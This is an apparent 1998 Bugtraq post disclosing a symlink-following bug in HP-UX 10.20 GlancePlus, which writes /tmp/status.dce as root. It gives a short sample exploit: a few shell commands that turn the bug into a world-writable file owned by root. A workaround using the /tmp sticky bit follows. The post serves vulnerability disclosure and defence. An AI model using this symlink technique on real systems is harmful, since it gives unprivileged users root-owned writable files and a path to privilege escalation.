Date: Mon, 27 Apr 1998 23:31:12 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: HP-UX glance bug (#4?)

    * Software:

    HP-UX B.10.20 D
    Glance.Runtime.GLANCE                 B.10.20.95     HP GlancePlus files

    * Bug:

    glance creates a /tmp/status.dce file as root, and it follows
    symlinks, so you can append text like

Pid: 16208  File: ndi_sm.c         Line:   2609   Mon Apr 27 21:52:23 1998
Performance Management Application registered.
--------------------------------------------------------------------------

    to any system file.

    * Sample exploit:

    $ umask 000
        $ cd /tmp
    $ ln -s /.test status.dce
    $ glance -j 1 -iterations 1 -maxpages 1
    $ ls -l /.test
    -rw-rw-rw-   1 root       bar           1080 Apr 27 23:06 /.test

    # edit /.test to match your needs

        * Workaround:

        I guess creating a non writable /tmp/status.dce file
        and setting the t bit on /tmp (which it seems it has
        not in the default HPUX installation) would be enough

    * Note: I've been looking for HP-UX bugs, and I have found
    several reported holes in glance; but it seems this one
    is new...

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)